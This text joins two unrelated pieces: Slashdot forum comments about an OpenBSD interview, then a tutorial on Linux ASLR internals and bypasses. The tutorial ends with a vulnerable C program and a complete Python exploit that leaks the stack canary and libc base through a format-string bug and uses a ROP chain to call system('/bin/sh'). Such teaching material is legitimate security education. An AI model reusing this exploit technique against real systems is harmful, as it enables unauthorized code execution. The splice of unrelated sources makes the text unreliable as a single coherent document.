sys.exit(0) The exploit itself should be quite self explanatory, but let’s quickly walk through it together. So first of all when launching the binary we wait for it to prompt us for the first input. When this happens we provide a bunch of format specifiers %llx. to get a leak from memory. Recall: %llx. format string is a long long-sized integer The leak will look something like this: 1.7f6c3501b790.a.0.7f6c35219c35019b78.7f6c3501b780.7f6c35244ca0.7f6c3501b780.1.ff000000000000.7f6c3501a620.0.7f6c3501a620.7f6c3501a6a4.7f6c3501a6a3.7ffdc2a905a0.7f6c34cd09e6.7f6c3501a620.0.0.7f6c34ccd439.7f6c3501a620.7f6c34cc4d94.0.5b9cf8225c7bc900. It turned out that the 2nd leaked value is a random address within libc. Since we got that one we were able to calculate the base address of libc by looking up the libc mapping of the current process from within gdb. gdb-peda$ vmmap Start End Perm Name 0x00400000 0x00401000 r-xp /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64 0x00600000 0x00601000 r--p /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64 0x00601000 0x00602000 rw-p /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64 0x01d12000 0x01d33000 rw-p [heap] 0x00007f6c34c55000 0x00007f6c34e15000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c34e15000 0x00007f6c35015000 ---p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c35015000 0x00007f6c35019000 r--p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c35019000 0x00007f6c3501b000 rw-p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c3501b000 0x00007f6c3501f000 rw-p mapped 0x00007f6c3501f000 0x00007f6c35045000 r-xp /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6c35218000 0x00007f6c3521b000 rw-p mapped 0x00007f6c35244000 0x00007f6c35245000 r--p /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6c35245000 0x00007f6c35246000 rw-p /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6c35246000 0x00007f6c35247000 rw-p mapped 0x00007ffdc2a72000 0x00007ffdc2a93000 rw-p [stack] 0x00007ffdc2a98000 0x00007ffdc2a9b000 r--p [vvar] 0x00007ffdc2a9b000 0x00007ffdc2a9d000 r-xp [vdso] 0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall] gdb-peda$ We can see that the randomized base address for the used libc starts at 0x7f6c34c55000. If we substract this value from the random libc leak we get the offset. This value marks the offset of the random libc address from the base address of libc. We can use exactly this offset value for any future execution to find our libc base address. This works, since we may have a fully randomized process memory and with that a randomized libc position in memory, but the offset of things within libraries is not changed and always has the same distance from the base address! Hence calculating the randomized base address of libc with a static offset value is working 100% of the time. All of this base calculation happens in get_libc_base_address(leak_dump). Having access to libc is like opening the box of the pandora. So much useful functions in there. I chose to go the ret2system way and calculated the address of system() and a pointer to /bin/sh from the libc base address. All of that happens in get_system_in_glibc(libc_base) and get_bin_sh_in_glibc(libc_base). A really valuable information happened to be at the 71th position in the leaked data. We got our stack canary, which we need to successfully leverage a buffer overflow! This one is especially easy to spot since its a 16 bit value where the 2 least significant bits are both 0. I just extracted the value from the dump in get_canary_value(leak_dump). All that is left now is putting it all together. This happens in create_payload(canary, system, shell). I’m filling the buffer until right before it overflows in the stack canary. Then I’m appending the canary value and continue to overwrite the RBP with some junk, since it’s irrelevant what we put here for the PoC. Afterwards our little friend the pop rdi; ret gadget is put onto the stack. Lastly a pointer to our wanted shell and the system call itself are added. Let’s visualize this in gdb. Right when we hit the ret instruction in trustMeIAmAnEngineer after our buffer overflow happened our registers and stack look like this: [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x7f6c34d4c260 (<__read_nocancel+7>: cmp rax,0xfffffffffffff001) RDX: 0x800 RSI: 0x7ffdc2a90090 (azaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab"...) RDI: 0x0 RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi) RIP: 0x400812 (<trustMeIAmAnEngineer+78>: ret) R8 : 0x7f6c35219700 (0x00007f6c35219700) R9 : 0x3 R10: 0x37b R11: 0x246 R12: 0x400670 (<_start>: xor ebp,ebp) R13: 0x7ffdc2a905a0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x40080a <trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77> 0x40080c <trustMeIAmAnEngineer+72>: call 0x400600 <[email protected]> 0x400811 <trustMeIAmAnEngineer+77>: leave => 0x400812 <trustMeIAmAnEngineer+78>: ret 0x400813 <main>: push rbp 0x400814 <main+1>: mov rbp,rsp 0x400817 <main+4>: sub rsp,0x10 0x40081b <main+8>: mov DWORD PTR [rbp-0x4],edi [------------------------------------stack-------------------------------------] 0000| 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi) 0008| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') 0016| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) 0024| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>) 0032| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax) 0040| 0x7ffdc2a904d0 --> 0x0 0048| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64") 0056| 0x7ffdc2a904e0 --> 0x135244ca0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$ We can see that all of our final payload is located on the stack. When executing the ret instruction the next value on the stack is popped and put into RIP. This will be our pop rdi; ret gadget. The top of the stack, the RSP, is changed accordingly to point to the next value on the stack, which is the pointer to our shell /bin/sh as well. [----------------------------------registers-----------------------------------] [...] RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') RIP: 0x400903 (<__libc_csu_init+99>: pop rdi) [...] [-------------------------------------code-------------------------------------] => 0x400903 <__libc_csu_init+99>: pop rdi 0x400904 <__libc_csu_init+100>: ret 0x400905: nop 0x400906: nop WORD PTR cs:[rax+rax*1+0x0] [------------------------------------stack-------------------------------------] 0000| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') 0008| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) 0016| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>) 0024| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax) 0032| 0x7ffdc2a904d0 --> 0x0 0040| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64") 0048| 0x7ffdc2a904e0 --> 0x135244ca0 0056| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp) [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$ Let’s execute pop rdi; ret now, which will put the current top of the stack into RDI, which is our shell pointer. Since our chosen gadget ends with a ret statment it’s next in the execution flow. It will continue execution with the next instruction RSP points to, which is our system() call! [----------------------------------registers-----------------------------------] [...] RDI: 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) RIP: 0x400904 (<__libc_csu_init+100>: ret) [...] [-------------------------------------code-------------------------------------] 0x4008fe <__libc_csu_init+94>: pop r13 0x400900 <__libc_csu_init+96>: pop r14 0x400902 <__libc_csu_init+98>: pop r15 => 0x400904 <__libc_csu_init+100>: ret 0x400905: nop 0x400906: nop WORD PTR cs:[rax+rax*1+0x0] 0x400910 <__libc_csu_fini>: repz ret 0x400912: add BYTE PTR [rax],al [------------------------------------stack-------------------------------------] 0000| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) 0008| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>) 0016| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax) 0024| 0x7ffdc2a904d0 --> 0x0 0032| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64") 0040| 0x7ffdc2a904e0 --> 0x135244ca0 0048| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp) 0056| 0x7ffdc2a904f0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$ Remember what I introduced in the x64 exploitation crash course? The first function argument on x64 needs to be put in RDI. We managed to place our pointer to /bin/sh there. And that’s all actually! system() is called with the contents of RDI as a function argument that gets us a shell. Alternative PoC: vmmap reveals that our stack ends at 0x00007ffdc2a93000 the 62th value in the leak is within the stack frame (0x7ffdc2a905a0). We could leverage this to call mprotect()on the stack to make him executable again too! PoC $ cat /proc/sys/kernel/randomize_va_space 2 $ python defeat_ASLR_x64.py INFO [*] '/home/lab/Git/RE_binaries/0x00sec_WIP/ASLR/binaries/vuln_x64_3' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) [*] '/lib/x86_64-linux-gnu/libc-2.23.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] Starting local process './binaries/vuln_x64_3': pid 18749 [+] Format string leak: [1.7f6e0caee790.a.0.7f6e0ccebe0caecb78.7f6e0caee780.7f6e0cd17ca0.7f6e0caee780.1.0.7f6e0caed620.0.7f6e0caed620.7f6e0caed6a4.7f6e0caed6a3.7ffdd976dcf0.7f6e0c7a39e6.7f6e0caed620.0.0.7f6e0c7a0439.7f6e0caed620.7f6e0c797d94.0.87ec97b667e1eb00.] [*] leaked position within libc is at 0x7f6e0caee790 [=>] That puts the libc base address at 0x7f6e0c728000 [+] [email protected] has offset: 0x45390 [+] This puts the system call to 0x7f6e0c76d390 [+] /bin/sh located @ offset 0x18cd57 [+] This puts the shell to 0x7f6e0c8b4d57 [+] Canary value is: 0x87ec97b667e1eb00 [*] Switching to interactive mode $ whoami lab $ Conclusion Address space layout randomization and position independent executables fully randomize the adress space of any executed binary and were implemented not just as another “final defense against attack X” mechanism, but to make exploiting in general a lot more difficult. The introduced randomness breaks any of the static exploit approaches taken before and made the game a lot more difficult. But the found design flaws especially on 32 bit operating systems reduce the viability of this technique by quite a lot. Luckily the era of 32 bit OSes comes to an end nowadays, at least in the desktop and server area, IoT is another topic :) … The showed PoC introduced x64 exploitation as well as showed how a possible bypass against an ASLR, DEP and stack canary hardened binary can look like. The used vulnerabilities were more than obvious and real life exploitation is (most often) a lot more difficult, but I think the general idea was conveyed in an easy to digest manner. At best you have an awesome memory leak, which gets you sone libc address and maybe even the canary. If RELRO is not fully enabled and we have a viable format string vulnerability at hand we can try to overwrite the entries within the GOT. PIE makes building ROP chains quite a bit more complex and was left out for the sake of understandability. Last but not least I hope you enjoyed the reading and as always I would appreciate your feedback to make future articles better! Sources References - Differences Between ASLR on Windows and Linux - Position Independent Executables (PIE) - Breaking Kernel Address Space Layout Randomization with Intel TSX - ASLR support for Linux - kernel ASLR (kASLR) support for Linux - Exploiting Linux and PaX ASLR’s weaknesses on 32- and 64-bit systems - Address Space Layout Randomization by PAX - Offset2lib: bypassing full ASLR on 64bit Linux - Surgically returning to randomized lib(c) - Linux Kernel on Git - Derandomizing Kernel Address Space Layout for Memory Introspection and Forensics - Practical Timing Side Channel Attacks against Kernel Space ASLR - Just-In-Time Code Reuse: On the Effectiveness of Fine-Grained Address Space Layout Randomization - On the Effectiveness of Address-Space Randomization New ASLR bypass presented in March 2018
https://0x00rick.com/research/2018/04/09/intro_adress_space_layout_rand.html
CC-MAIN-2019-30
refinedweb
6,718
50.77
Free JSP download Books Free JSP download Books Java Servlets and JSP free download books... optimization. The Professional JSP Books The JDC jsp online exam... jsp online exam... Plz provide me front end design Programming Books books and download these books for future reference. These Free Computer Books... Free Java Books Free JSP Books... Programming Books A Collection of Large number of Free jsp online exam jsp online exam i have designed a html page with 20 multiple choice questions ...options are in radio button for each question .... now i have to retrieve all the selected answers and save it to database match it with correct Free Java Books Free Java Books Sams Teach Yourself Java 2 in 24 Hours As the author of computer books, I spend a lot...; Noble and Borders, observing the behavior of shoppers browsing through the books how to create online exam in jsp and database how to create online exam in jsp and database learing stage ,want to know how to create online exam Struts Books ; Free Struts Books The Apache... of this sample project evolves. The emphasis is on rapid learning through clear.... Informit Safari Tech Books Online Free JSP Books Free JSP Books  ... Servlet 2.3 filtering, the Jakarta Struts project and the role of JSP and servlets... Insiders, all free, no registration required. If you are interested in links to JSP Servlets Books ; Books : Java Servlet & JSP Cookbook...; Holborn Books Online Core Servlets... leading free servlet/JSP engines- Apache Tomcat, the JSWDK, and the Java Web Server Free JSP Books Free JSP Books Download the following JSP books... it is sent by POST. How to using JSP HTML Form coding for project coding for project hai how to write jsp coding for project smart accessories ...... that s to navigate to another page when you click on a tag online shopping cart complete coding in pure jsp online shopping cart complete coding in pure jsp online shopping cart complete coding in pure jsp Please visit the following link: JSP Online shopping cart online examination system project in jsp online examination system project in jsp How many and which data tables are required for online examination system project in jsp in java. please give me the detailed structure of each table online shopping project online shopping project sir, plz can u send me the coding of simple application of online shopping cart project using jsp and servlets which should be run in netbeans without any errors Sample\Practice project on JSP and Web services Sample\Practice project on JSP and Web services I wanted to implement\Practice a project using web services. where can I get these details Please visit the following link: online examination system project in jsp online examination system project in jsp How to show the status bar which shows how much time is remaining in online examination system in jsp.my coding in jsp & servlet coding in jsp & servlet plz... provide me coding of "online examination system" in jsp & servlet JSF Books ; O'Reilly Safari Online Books of JSF Over the last few.... Safari Books Online JSF...JSF Books   Download Button - JSP-Servlet Download Button HI friends, This is my maiden question at this site. I am doing online banking project, in that i have "mini statement" link. And i want the Bank customers to DOWNLOAD the mini statement. Can any one help me Java Programming Books download the entire book in PDF format for free, and you will also find... Java Programming Books  ... As the author of computer books, I spend a lot of time loitering in the computer Programming Books JSP Programming Books  ... using Servlet 2.3 filtering, the Jakarta Struts project and the role of JSP... content authored by the JSP Insiders, all free, no registration required. If you coding jsp coding what is the simple jsp code for bus ticket reservation system online exam online exam The file geneexpr500x204.gct contains gene expression values for 500 genes (analytes) and 204 samples. (a) Extract the sample names from the file geneexpr500x204.gct. Save the list (one sample name per line Charts in JSP - JSP-Servlet which it can be downloaded... Appreciable if I have the sample coding... am currently in a project where i must display the database results in terms of charts in JSP.. So, Can i know the pre requirement for that? Do i need Online quiz mini project Online quiz mini project Hi. I follow one of the code for "Online quiz mini project". I would like to know how to count the number of wrong answers in jsp Ajax Books over ASP, PHP, JSP, etc.) - the coding on the client does become more... Ajax Books AJAX - Asynchronous JavaScript and XML - some books and resource links These books PDF books ; The free servlet and JSP Books Slides and exercises from Marty Hall's world...JSP PDF books Collection is jsp books in the pdf format sample JSP&Servlet application required? - JSP-Servlet sample JSP&Servlet application required? hey all iam new... tutorial or a project that integrate both jsp&servlets any help? Hi Tomcat Books , there are currently few books and limited online resources to explain the nuances of JSP... Tomcat Books  ... and Code Download Tomcat is an open source web server that processes JavaServer coding coding I need the logout coding. can you please help me. Please visit the following links: JSP Project JSP Project Sample program of JSP Sample program of JSP <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " coding coding how to write a code for searching a link in another jsp file?pl give the soln soon Sample program Free J2EE Online Training Free J2EE Online Training The Enterprise Edition of Java popularly known... professionals free online J2EE training there are various websites but the quality.... So give a boost to your career with free online J2EE training Need E-Books - JSP-Servlet jsp online ex jsp online ex wat is the parametr u passed ...ques | JSP PDF books | Free JSP Books | Free JSP Download | Authentication... uing JDBC in JSP | Download CSV File from Database in JSP JSP... | Download images from Database in JSP | How to Create JSP Page | How project project Sir, I have required coding and design for bank management system in php mysql. I hope u can give me correct information. Please visit the link: JSP Bank Application The above link will be helpful for you jsp online ex jsp online ex how to sum up the count of a cloumn in mysql and display ot on jsp when asked to calculate JAVA JAZZ UP - Free online Java magazine JAVA JAZZ UP - Free online Java magazine  .... API Updates The Apache Project has... and JavaServer Pages (JSP) for creating enterprise-grade web applications. Earlier JSP Project JSP Project Register.html <html> <body > <form...; <%! %> <jsp:useBean <jsp:setProperty < Struts Book - Popular Struts Books , the Jakarta-Tomcat JSP/servlet container, and much more. Struts Books... Struts Book - Popular Struts Books Programming Jakarta... with Servlets and JSPs is becoming, the online documentation is inadequate, focusing jsp jsp sir i want to jsp code for online examination like as bank po,,,,,,plz help me sir JSP JSP FILE UPLOAD-DOWNLOAD code USING JSP J2ME Books J2ME Books Free J2ME Books J2ME programming camp... covered by many other books. After a comprehensive analysis of the landscape secure online payment code for jsp secure online payment code for jsp how to implements online payment in jsp java/jsp code to download a video java/jsp code to download a video how can i download a video using jsp/servlet JSP JSP i need coding for auto text and auto complete of my database for my JSP with out using plugin if any one know answer if any one know's coding for it give me some suggestion File Download in jsp File Download in jsp file upload code is working can u plz provide me file download Download file - JSP-Servlet Servlet download file from server I am looking for a Servlet download file example online examination system mini project online examination system mini project i developed a project on online examination system using jsp and java script . I am getting the quetion... in finding out that..only that part had left for my project completion.please help me pagination - JSP-Servlet Jsp pagination Iam doing a online exam application for this i need... tell me the solution Hi friend, For Jsp pagination application visit...: online bookstore - JSP-Servlet online bookstore i want code for online bookshop.please send mo soon.......... Hi Friend, Please specify some details. Thanks download - JSP-Servlet download here is the code in servlet for download a file. while...; /** * * @author saravana */ public class download extends HttpServlet...(); System.out.println("inside download servlet"); BufferedInputStream Online Quiz Application in JSP Online Quiz Application in JSP  ... are going to implement of Online quiz application using of JSP. Step 1: Create... quiz question and answer form using with JSP or JDBC database. Here download image using url in jsp download image using url in jsp how to download image using url in jsp Advertisements If you enjoyed this post then why not add us on Google+? Add us to your Circles
http://roseindia.net/tutorialhelp/comment/93200
CC-MAIN-2015-40
refinedweb
1,555
62.98
Testing Web Services You can test Web services by calling Web methods from unit tests. Testing Web services is much like testing other code by using unit tests in that you can use Assert statements, and the tests produce the same range of results. However, the Microsoft.VisualStudio.TestTools.UnitTesting.Web namespace of Team Edition for Testers provides attributes and methods specifically for testing Web services; they are described in Testing a Web Service Locally. The following list describes two ways to test Web services with unit tests: The Web service runs on an active Web server. There are no special requirements for testing a Web service that runs on a local or a remote Web server, such as IIS. To do this, add a Web reference and then call the Web methods of the Web service from your unit tests just as they would call the methods of a program that is not a Web service. For information about how to add a Web reference, see Add Web Reference Dialog Box. For information about how to create unit tests, see How to: Generate a Unit Test and How to: Author a Unit Test. For information about how to use a Web test to test a Web service, see How to: Create a Web Service Test. The Web service is not hosted in an active Web server. As described in Testing a Web Service Locally, you can test a Web service that runs on your local computer and not in a Web server, such as IIS. To do this, you use an attribute provided by the Team System testing tools to start ASP.NET Development Server. This creates a temporary server at localhost that hosts the Web service that you are testing. For more information about ASP.NET Development Server, see Web Servers in Visual Web Developer. Testing a Web Service Locally This is the process for testing a Web service that runs on your local computer but not in IIS: Create the Web service on the local file system. For more information, see Walkthrough: Creating an XML Web Service Using Visual Basic or Visual C#. Generate unit tests against the Web service in the standard way for generating unit tests. For more information, see How to: Generate a Unit Test. Add the AspNetDevelopmentServerAttribute attribute to the unit test. The arguments for this attribute class point to the site of the Web service and name the server. For more information, see Ensuring Access to ASP.NET Development Server. Within the unit test, add a call to the TryUrlRedirection method to point the Web service object to the correct server. Verify that it returns true, and use and Assert statement to fail the test if the redirection fails. For more information, see Using the TryUrlRedirection Method. Call the Web service or exercise it in any other way that you feel is necessary to test it thoroughly. For an example of this, see Example Web Service Test Method. Ensuring Access to ASP.NET Development Server If the site of the Web service is on your local file system, it uses ASP.NET Development Server and it is not an IIS site. In this case, the process of generating unit tests starts an ASP.NET Development Server for the Web service and adds a Web reference to the test project. The ASP.NET Development Server is temporary , and the Web reference would fail after the server is stopped. Team System testing tools solve this problem by providing the AspNetDevelopmentServer attribute. This attribute class has two constructors: AspNetDevelopmentServerAttribute(string name, string pathToWebApp) AspNetDevelopmentServerAttribute(string name, string pathToWebApp, string webAppRoot) The following parameters are used with this attribute: nameis a user-defined name that is associated with the server. pathToWebAppis the path on disk to the Web site you are testing. webAppRootis the virtual path at which the site appears on the server. For example, if webAppRootis set to /WebSite1, the path to the site is:<port>/WebSite1. For the first constructor, the default is:<port>/. Note The parameters pathToWebApp and webAppRoot are used the same way with AspNetDevelopmentServerAttribute as they are for the AspNetDevelopmentServerHost attribute, which is used for ASP.NET unit tests. When you mark a test with the attribute AspNetDevelopmentServerAttribute, an ASP.NET Development Server is started whenever the test is run. An entry that contains the URL of the site being tested is added to TestContext.Properties of the test class . The key for this entry is AspNetDevelopmentServer.<name>, where <name> is the value held by the name argument of the attribute. This mechanism makes sure that the Web service is always available at an ASP.NET Development Server when the test is run and that the URL is known at run time. To test a Web service this way, you could generate unit tests, or you could write a unit test by hand and mark it with this attribute. Hand authoring requires that you have a Web reference in place so that you can reference the type of the Web service in the code of your unit test. Before you add the Web reference, you must start an ASP.NET Development Server by right-clicking the Web service project and choosing View in Browser. Using the TryUrlRedirection Method After you have a Web reference, you can create an instance of the Web service object in your test code, but this might fail at run time because the reference points to the URL of an instance of ASP.NET Development Server that may no longer be running. To solve this problem, use the TryUrlRedirection method to modify the Web service object so that it points to the ASP.NET Development Server that was started specifically for the running unit test. TryUrlRedirection is a static method of the WebServiceHelper class that returns a Boolean that indicates whether the redirection succeeded. bool TryUrlRedirection(System.Web.Protocols.WebClientProtocol client, TestContext context, string identifier) TryUrlRedirection takes three arguments: clientis the Web service object to be redirected. contextis the TestContext object for the class. identifieris the user-defined name for the server to which the Web service object is being redirected. After calling this method, if it succeeds, you can then call Web methods on the Web service object. In this way, the Web service is accessed through the ASP.NET Development Server that was started when you started the unit test. You can use multiple AspNetDevelopmentServer attributes on a single unit test to start multiple servers, as long as you give them different names. Unit test generation does not automatically add the AspNetDevelopmentServer attribute or the TryUrlRedirection method call. You must add these entities yourself. Both the attribute and the method are in Microsoft.VisualStudio.TestTools.UnitTesting.Web. Therefore, you will probably need a using or Imports statement, as shown in the following example. Example Web Service Test Method This is a simple test method that tests the HelloWorld() Web method of a Web service: using Microsoft.VisualStudio.TestTools.UnitTesting; using Microsoft.VisualStudio.TestTools.UnitTesting.Web; using TestProject1.localhost; [TestMethod] [AspNetDevelopmentServer("HelloWorldServer", @"C:\Documents and Settings\user\My Documents\Visual Studio 2005\WebSites\WebSite1")] public void HelloWorldTest() { HelloWorldService target = new HelloWorldService(); Assert.IsTrue( WebServiceHelper.TryUrlRedirection ( target, testContextInstance, "HelloWorldServer" ), "Web service redirection failed." ); string expected = "Hello World"; string actual; actual = target.HelloWorld(); Assert.AreEqual( expected, actual, "TestProject1.localhost.HelloWorldService.HelloWorld did not return the expected value." ); } See Also Tasks How to: Generate a Unit Test How to: Author a Unit Test How to: Parameterize a Web Server Reference Microsoft.VisualStudio.TestTools.UnitTesting.Web AspNetDevelopmentServerAttribute TryUrlRedirection Concepts Web Servers in Visual Web Developer
https://docs.microsoft.com/en-us/previous-versions/ms243399%28v%3Dvs.80%29
CC-MAIN-2020-10
refinedweb
1,266
56.55
Fluent NHibernate Has a Wiki Fluent NHibernate (previously covered by InfoQ) is an alternative to using XML mappings in NHibernate. Fluent NHibernate is using a fluent interface allowing one to define mappings in code instead of XML. Some people in the community have complained about the lack of documentation for Fluent NHibernate and as a response James Gregory recently announced the official Wiki for Fluent NHibernate. Examples of documentation found in the Wiki are: - An introduction - How to create your first Fluent NHibernate project - How to convert an existing NHibernate application to Fluent NHibernate. The Wiki shows a typical mapping scenario with both XML and Fluent NHibernate. Using XML it would look something like this: <> The same mapping using Fluent NHibernate would look like this: public class CatMap : ClassMap { public CatMap() { Id(x => x.Id); Map(x => x.Name) .WithLengthOf(16) .Not.Nullable(); Map(x => x.Sex); References(x => x.Mate); HasMany(x => x.Kittens); } } They continue by saying: While the separation of code and XML is nice, it can lead to several undesirable situations. They then list some examples: - Due to XML not being evaluated by the compiler, you can rename properties in your classes that aren't updated in your mappings; in this situation, you wouldn't find out about the breakage until the mappings are parsed at runtime. - XML is verbose; NHibernate has gradually reduced the mandatory XML elements, but you still can't escape the verbosity of XML. - Repetitive mappings - NHibernate HBM mappings can become quite verbose if you find yourself specifying the same rules over again. For example if you need to ensure all stringproperties must be not-null, and have a length of 1000, and all ints must have a default value of -1. In August last year, Oren Eini (a.k.a. Ayende Rahien), pointed out that Fluent NHibernate didn’t add any value because there had to be a mapping class per entity. Since then however, the project has evolved and they now have the concept of Auto Mapping, which is what Ayende was asking for. The Auto Mapping feature uses a set of conventions to automatically map all entities, not requesting a mapping class per entity. Programmatic Configuration (Fluent APIs) is the way to go! by Sergio Olive
http://www.infoq.com/news/2009/02/fluent-nhibernate-wiki
CC-MAIN-2015-18
refinedweb
377
54.22
With IoT (Internet of Things) on the rise and hardware getting cheaper and cheaper, it’s a great time to explore the possibilities this new technology provides. In this tutorial, I will show you how to create your own thermometer app using a NodeMcu microcontroller, a DHT22 temparature and humidity sensor and the Flask framework. We will use the NodeMcu to gather sensor data from our DHT22 sensor and send it to a REST-API implemented in Flask. To read and display this data, we will create a simple HTML page which will download the data from our API: You can check out the entire source code on my github page. You can buy all the hardware for a very cheap price on amazon or alibaba. I went with the NodeMcu and Breadboard starter kit on amazon. Before we can write any code, we have to combine all the components required for the thermometer. We will connect our NodeMcu with the DHT22 sensor and power both components using a simple power supply. Let’s start by (literally) wiring up our new hardware. First, grab an empty breadboard and put the power adapter on it: width="640px" alt="Image 2" data-src="/KB/boards-embedded-devices/1277175/step1.jpg" class="lazyload" data-sizes="auto" data-> Now, connect it to a battery using the power adapter. Before you connect the NodeMcu, make sure both switches that control the voltage are set to 3.3V, otherwise, you might fry the poor NodeMcu! Make sure everything works by pressing the power button: width="640px" alt="Image 3" data-src="/KB/boards-embedded-devices/1277175/step2.jpg" class="lazyload" data-sizes="auto" data-> Now it’s time to put the NodeMcu on the board. Since my boards are very small, I had to add a second one to fit the NodeMcu comfortably: width="640px" alt="Image 4" data-src="/KB/boards-embedded-devices/1277175/step3.jpg" class="lazyload" data-sizes="auto" data-> Time to connect our NodeMcu with the power supply. Again, make sure the power supply is set to 3.3V. We will use the negative pole of our power supply as GND (Ground) pin, so let’s use our jumper cables to connect one of the G pins of the NodeMcu to the negative pole. The 3V pin should then go to the positive pole of the power supply: width="640px" alt="Image 5" data-src="/KB/boards-embedded-devices/1277175/step4.jpg" class="lazyload" data-sizes="auto" data-> To make sure the power supply is connected correctly, you can flash the NodeMcu with a program to blink the LED. I will explain how you can overwrite the NodeMcu code later. Finally, we can connect the DHT22 temperature sensor. As you can see in the DHT22 pinout, we have to connect the first pin to the positive terminal and the last pin to GND. The second pin is the data pin which must be connected to the NodeMcu for it to read the sensor data. You can use any Data pin on the NodeMcu for this, just make sure to remember which one you chose so you can easily program it later. I`ve chosen D2 as data pin. width="640px" alt="Image 6" data-src="/KB/boards-embedded-devices/1277175/step5.jpg" class="lazyload" data-sizes="auto" data-> This concludes our trip into the hardware tinkering world for now. Put aside the board(s) and let’s start writing some C code to give life to our newly created Microcontroller. There are many ways to write software for microcontrollers, but to keep things simple, I decided to stick with C. If you haven’t written code for microcontrollers like a NodeMcu before, this is the most straightforward way. We will use the Arduino IDE to write the code for our NodeMcu and then flash it. Let’s start by importing all the libraries we will need: #include <SimpleDHT.h> // read temperature data from our DHT22 sensor #include <ESP8266WiFi.h> // control the NodeMcu #include <ESP8266HTTPClient.h> // send http requests from the NodeMcu To use these libraries, go to Tools -> Library manager and search for and install the SimplDHT and Adafruit libraries. If you haven`t worked with Arduino before, I recommend you check out some tutorials to get started. Once you feel comfortable with the IDE, let’s continue by setting up our Wifi connection: const char* ssid = "***"; const char* password = "***"; void setup_wifi() { WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(1000); Serial.println("Connecting..."); } } void setup() { Serial.begin(115200); setup_wifi(); } void loop() { } The setup method will be called by the NodeMcu only once upon startup, so it’s the perfect place to set up our WiFi connection initially. I put the WiFi code into its own method so we can re-use it later in case of connection problems. To see what our NodeMcu is doing during development time, I also set up a Serial connection. This way we can print errors to Arduino Serial Monitor. The WiFi code tries to establish a connection every 1000ms. Once it succeeds, the loop will end and our setup code will be done. Flash the NodeMcu and open the Serial Monitor, you should be seeing something like this: setup width="640px" alt="Image 7" data-src="/KB/boards-embedded-devices/1277175/0bc0244d-f03a-4ca5-9c3c-c63cc36ddec6.Png" class="lazyload" data-sizes="auto" data-> Now, let’s implement the loop method, which will be called continuously by our NodeMCU while it’s activated: loop%"); delay(2500); Here, after declaring all required variables, we use the DHT22 library to read both the temperature and humidity from our sensor. If an error occurred, we wait for 2.5s and end the current iteration of the loop. Otherwise, we print the acquired data to the Serial port. Again, I added a 2.5s delay here. This is important because the DHT22 sensor only allows us to read data every 2s, so we have to give it some time after each request. Flash the NodeMcu again and open the Serial monitor. The output should look similar to this: width="640px" alt="Image 8" data-src="/KB/boards-embedded-devices/1277175/temperature.png" class="lazyload" data-sizes="auto" data-> This looks very nice already, but our goal is not to print the temperature data to the Serial monitor. Instead, we are going to send 